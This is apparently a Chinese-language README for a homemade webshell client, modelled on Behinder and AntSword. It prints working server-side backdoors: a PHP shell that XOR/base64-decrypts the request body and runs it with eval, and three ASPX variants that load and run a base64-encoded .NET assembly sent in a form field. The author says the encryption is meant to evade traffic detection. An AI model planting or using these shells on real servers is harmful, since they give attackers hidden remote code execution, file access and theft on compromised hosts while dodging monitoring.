主要功能
- 已完成 aspx,php 虚拟终端,文件管理,增删改查,文件上传
- HTTP代理
- 更新内容:php xor+base64加密,aspx base64加密
php
参考冰蝎实现xor+base64流量加密,更好绕过流量检测
webshell
<?php
function Decrypt($data)
{
$key="e45e329feb5d925b";
$bs="base64_"."decode";
$after=$bs($data."");
for($i=0;$i<strlen($after);$i++) {
$after[$i] = $after[$i]^$key[$i+1&15];
}
return $after;
}
eval(Decrypt(file_get_contents("php://input")));
?>
aspx
参考AntSword-Csharp-Template 中国蚁剑Csharp一句话Payload
https://github.com/AntSwordProject/AntSword-Csharp-Template
shell.aspx
为了兼容各种情况下的内存马,Equals中的入口参数可以为System.Web.HttpContext对象,或者包含Request与Response对象的数组。
<%@ Page Language="c#"%>
<%
String Payload = Request.Form["ant"];
if (Payload != null)
{
System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(Context);
}
%>
<%@ Page Language="c#"%>
<%
String Payload = Request.Form["ant"];
if (Payload != null)
{
System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(new object[] {
Request, Response });
}
%>
<%@ Page Language="c#"%>
<%
String Payload = Request.Form["ant"];
if (Payload != null)
{
System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(null);
}
%>
加密效果
代码写的不是很好,主要是用C#造轮子,来锻炼编程能力
开源地址:
https://github.com/wy876/tools